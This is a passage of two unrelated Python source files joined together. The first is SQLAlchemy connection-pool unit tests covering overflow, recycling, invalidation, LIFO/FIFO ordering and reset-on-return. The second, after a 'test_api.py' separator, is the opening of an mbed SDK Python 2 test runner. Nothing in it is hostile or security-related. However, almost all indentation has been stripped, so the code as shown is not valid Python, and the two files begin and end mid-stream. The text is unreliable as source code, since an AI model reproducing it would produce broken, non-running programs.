try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2
)
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
# new connection was reset on return appropriately
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
        # return 7 of them back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
        # run an error + invalidate operation on all 15 connections
        # (both the checked-out ones and those returned to the pool)
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
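        # with LIFO, the most recently checked-in connection (c3) is handed
        # out again on every checkout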
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
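        # with FIFO (the default), connections come back out in the order
        # they were checked in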
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
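        # with a reset agent attached, the pool delegates reset-on-return to
        # the agent (special_rollback) instead of the DBAPI rollback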
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_reset_agent_disconnect(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
p._invalidate(self.conn)
raise Exception("hi")
def commit(self):
self.conn.commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
# no warning raised. We know it would warn due to
# QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import scan_for_source_paths
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.toolchains import TOOLCHAIN_BIN_PATH
from tools.test_exporters import ReportExporter, ResultExporterType
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
            # table shows test x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
    TEST_LOOPS_LIST = [] # We redefine no. of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
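        # The pattern matches any of the TEST_RESULT_MAPPING keys wrapped in
        # braces (e.g. "{success}") as emitted in the host test output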
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
